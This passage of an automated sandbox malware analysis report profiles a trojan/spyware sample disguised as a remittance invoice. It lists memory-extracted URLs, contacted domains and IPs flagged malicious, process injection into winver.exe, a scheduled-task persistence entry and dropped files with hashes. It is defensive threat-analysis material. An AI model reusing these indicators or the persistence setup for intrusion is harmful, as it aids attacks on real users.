                                        http://duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwwinver.exe, 00000011.00000002.4495925403.0000000005A56000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003A66000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://files.reg.ru/fonts/inter/Inter-Regular.woff)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.hover.com/domains/resultswinver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon-16.svg?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://server27.hosting.reg.ru/managervFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://feeds.soundcloud.com/users/soundcloud:users:38128127/sounds.rss4TH HIRE SOA REMITTANCE_USD280,000.exe, GRogNEHvcL.exe.0.drfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2082504139.0000000002831000.00000004.00000800.00020000.00000000.sdmp, GRogNEHvcL.exe, 0000000A.00000002.2272188144.0000000002BA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://twitter.com/hoverwinver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowinver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/19/19m/19mvcd.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/2r/2rd/2rdzz2.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://files.reg.ru/fonts/inter/Inter-Medium.woff2)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://2domains.ruwinver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.netwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/17/178/178on3.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.ecosia.org/newtab/winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/2i/2iw/2iwzy5.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ac.ecosia.org/autocomplete?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://files.reg.ru/fonts/inter/Inter-Medium.woff)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://codepen.io/uzcho_/pens/popular/?grid_type=listwinver.exe, 00000011.00000002.4495925403.0000000006230000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004240000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://codepen.io/uzcho_/pen/eYdmdXw.csswinver.exe, 00000011.00000002.4495925403.0000000006230000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004240000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/49/49x/49xmuk.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.lesfleursdeceline.be/page-not-found-404/vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://files.reg.ru/fonts/inter/Inter-Regular.woff2)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.svg?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://reg.ru?target=_blankwinver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        183.181.79.111 | www.cica-rank.com | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true
                                        51.195.44.77 | www.adylkerak.ru | France | 16276 | OVHFR | true
                                        65.181.132.158 | e6375a47.jl884.vip.cname.scname.com | United States | 7859 | PAIR-NETWORKSUS | true
                                        199.59.243.225 | www.equi-sen.ca | United States | 395082 | BODIS-NJUS | true
                                        66.29.149.46 | www.falldove.top | United States | 19538 | ADVANTAGECOMUS | true
                                        103.138.88.50 | duhocvietanh.edu.vn | Viet Nam | 45538 | ODS-AS-VNOnlinedataservicesVN | true
                                        78.142.211.199 | www.diplocity.org | Turkey | 209853 | VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi | true
                                        31.31.196.16 | www.pilatovparts.ru | Russian Federation | 197695 | AS-REGRU | true
                                        3.125.172.46 | lb.webnode.io | United States | 16509 | AMAZON-02US | true
                                        173.254.28.213 | newmediamonday.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                        217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
                                        3.33.130.190 | retrorocketmodels.com | United States | 8987 | AMAZONEXPANSIONGB | true
                                        216.40.34.41 | www.botcsllc.com | Canada | 15348 | TUCOWSCA | true
                                        Joe Sandbox version: 40.0.0 Tourmaline
                                        Analysis ID: 1447924
                                        Start date and time: 2024-05-27 12:41:16 +02:00
                                        Joe Sandbox product: CloudBasic
                                        Overall analysis duration: 0h 11m 47s
                                        Hypervisor based Inspection enabled: false
                                        Report type: full
                                        Cookbook file name: default.jbs
                                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed: 20
                                        Number of new started drivers analysed: 0
                                        Number of existing processes analysed: 0
                                        Number of existing drivers analysed: 0
                                        Number of injected processes analysed: 2
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode: default
                                        Analysis stop reason: Timeout
                                        Sample name: 4TH HIRE SOA REMITTANCE_USD280,000.exe
                                        Detection: MAL
                                        Classification: mal100.troj.spyw.evad.winEXE@23/16@15/13
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 203
                                        • Number of non-executed functions: 300
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        Time | Type | Description
                                        06:42:07 | API Interceptor | 2x Sleep call for process: 4TH HIRE SOA REMITTANCE_USD280,000.exe modified
                                        06:42:09 | API Interceptor | 36x Sleep call for process: powershell.exe modified
                                        06:42:13 | API Interceptor | 2x Sleep call for process: GRogNEHvcL.exe modified
                                        06:43:15 | API Interceptor | 9454654x Sleep call for process: winver.exe modified
                                        12:42:10 | Task Scheduler | Run new task: GRogNEHvcL path: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Process:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379552885213346
                                          Encrypted:false
                                          SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCsIfA2KRHmOugw1s
                                          MD5:3E5712DC6AFCA8CF60C5CB8BE65E2089
                                          SHA1:CDBAF3935912EFB05DBE58CA89C5422F07B528A0
                                          SHA-256:B9F7E5F0AFD718D8585A8B37DD8C459ECDD4E7E68C5FE61631D89CDD3E229833
                                          SHA-512:1BD81033EB26CD0EE3DEF6F02FECB4097D878D61CAA5BEF6739C51E889B99C9E695BECF51719959D33F7BA9838E202ADD7EE4DD704D5163B584F4E8B8B7ECC38
                                          Malicious:false
                                          Process:C:\Windows\SysWOW64\winver.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.121297215059106
                                          Encrypted:false
                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                          Malicious:false
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1583
                                          Entropy (8bit):5.104014790909776
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiiv
                                          MD5:571F67E1C245EDF95D7DC148D7384F65
                                          SHA1:161B18FFD99EB0A13D221CB21C005549A1F84B7F
                                          SHA-256:8CE3C94CFCE56784151159C105B035692E40E4415A362AA99A722628D77EC2B3
                                          SHA-512:B8ABE02701A09381E23D1F217AE259A02BE624FCF10FC2009C15A29750C133E4DD942C79DE246C9CCBFD960C3AF6D9E9C754F33FBF1F3570F387ADC5DBDA78DE
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                          Process:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1583
                                          Entropy (8bit):5.104014790909776
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtiuxvn:cgergYrFdOFzOzN33ODOiDdKrsuTiiv
                                          MD5:571F67E1C245EDF95D7DC148D7384F65
                                          SHA1:161B18FFD99EB0A13D221CB21C005549A1F84B7F
                                          SHA-256:8CE3C94CFCE56784151159C105B035692E40E4415A362AA99A722628D77EC2B3
                                          SHA-512:B8ABE02701A09381E23D1F217AE259A02BE624FCF10FC2009C15A29750C133E4DD942C79DE246C9CCBFD960C3AF6D9E9C754F33FBF1F3570F387ADC5DBDA78DE
                                          Malicious:false
